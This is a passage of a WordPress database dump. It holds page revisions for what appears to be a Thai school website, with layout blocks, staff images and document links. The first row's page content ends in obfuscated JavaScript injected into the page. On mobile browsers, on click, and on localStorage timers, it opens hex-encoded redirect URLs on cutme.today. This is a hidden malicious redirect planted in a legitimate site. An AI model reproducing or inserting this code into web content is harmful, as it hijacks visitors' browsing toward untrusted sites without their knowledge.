_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 10:52:15','2024-09-24 03:52:15','',19,'http://watprato.ssk.in.th/?p=414',0,'revision','',0),
(416,2,'2024-09-24 11:04:58','2024-09-24 04:04:58','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleM